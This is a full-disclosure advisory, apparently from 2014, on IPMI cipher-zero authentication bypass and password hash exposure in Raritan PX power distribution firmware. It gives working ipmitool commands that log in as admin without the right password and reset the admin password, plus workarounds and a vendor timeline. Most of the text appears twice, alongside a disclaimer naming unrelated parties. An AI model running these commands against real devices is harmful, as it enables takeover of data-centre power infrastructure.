Raritan PX power distribution software contains several well known IPMI vulnerabilities, e.g.
- ipmi zero cipher
- ipmi dump hash passwords
Details:
E.g. Model DPXR20A-16:
Software release all before and including 01.05.08 (recent version from october 2013)
ipmitool -I lanplus -C 0 -H 17.XX.XX.XX -U admin -P ad shell ipmitool> user list
2 admin true false true OEM
ipmitool> user set password 2 foo
ipmitool -I lanplus -C 0 -H 1XX.XX.XX.XX -U admin -P ad lan print Set in Progress : Set Complete
Auth Type Support : NONE MD2 MD5 PASSWORD
Auth Type Enable : Callback :
: User : MD5
: Operator : MD5
: Admin : MD5
: OEM : MD5
IP Address Source : Unspecified IP Address : 17.XX.XX.XX
Subnet Mask : 255.255.255.224
MAC Address : 00:00:00:00:00:00
SNMP Community String : public
IP Header : TTL=0x40 Flags=0x40 Precedence=0x00 TOS=0x10
BMC ARP Control : ARP Responses Enabled, Gratuitous ARP Disabled Gratituous ARP Intrvl : 2.0 seconds
Default Gateway IP : 17.XX.XX.XX
Default Gateway MAC : 00:00:00:00:00:00 Backup Gateway IP : 0.0.0.0
Backup Gateway MAC : 00:00:00:00:00:00 RMCP+ Cipher Suites : 0,1,2,3,6,7,8,11,12 Cipher Suite Priv Max : uuuOXXuuOXXuOXX : X=Cipher Suite Unused
: c=CALLBACK
: u=USER
: o=OPERA TOR
: a=ADMIN
: O=OEM
Workaround:
- Block IPMI Port 623
- Hang to management network only
- Don't use Raritan
Timeline:
2014/02/19 - Contacted CERT, VR#HRS35Y8S
2014/05/20 - Vendor claims its fixed but won't release new firmware to verify.
2014/07/03 - Vendor claims its fixed but still won't release new firmware to verify, neither won't send firmware to me.
2014/07/03 - FD because lack of interest and time
Authored by Joerg Kost
joerg.kost.fd@gmx.eu
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
- ipmi zero cipher
- ipmi dump hash passwords
Details:
E.g. Model DPXR20A-16:
Software release all before and including 01.05.08 (recent version from october 2013)
ipmitool -I lanplus -C 0 -H 17.XX.XX.XX -U admin -P ad shell ipmitool> user list
2 admin true false true OEM
ipmitool> user set password 2 foo
ipmitool -I lanplus -C 0 -H 1XX.XX.XX.XX -U admin -P ad lan print Set in Progress : Set Complete
Auth Type Support : NONE MD2 MD5 PASSWORD
Auth Type Enable : Callback :
: User : MD5
: Operator : MD5
: Admin : MD5
: OEM : MD5
IP Address Source : Unspecified IP Address : 17.XX.XX.XX
Subnet Mask : 255.255.255.224
MAC Address : 00:00:00:00:00:00
SNMP Community String : public
IP Header : TTL=0x40 Flags=0x40 Precedence=0x00 TOS=0x10
BMC ARP Control : ARP Responses Enabled, Gratuitous ARP Disabled Gratituous ARP Intrvl : 2.0 seconds
Default Gateway IP : 17.XX.XX.XX
Default Gateway MAC : 00:00:00:00:00:00 Backup Gateway IP : 0.0.0.0
Backup Gateway MAC : 00:00:00:00:00:00 RMCP+ Cipher Suites : 0,1,2,3,6,7,8,11,12 Cipher Suite Priv Max : uuuOXXuuOXXuOXX : X=Cipher Suite Unused
: c=CALLBACK
: u=USER
: o=OPERA TOR
: a=ADMIN
: O=OEM
Workaround:
- Block IPMI Port 623
- Hang to management network only
- Don't use Raritan
Timeline:
2014/02/19 - Contacted CERT, VR#HRS35Y8S
2014/05/20 - Vendor claims its fixed but won't release new firmware to verify.
2014/07/03 - Vendor claims its fixed but still won't release new firmware to verify, neither won't send firmware to me.
2014/07/03 - FD because lack of interest and time
Authored by Joerg Kost
joerg.kost.fd@gmx.eu
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information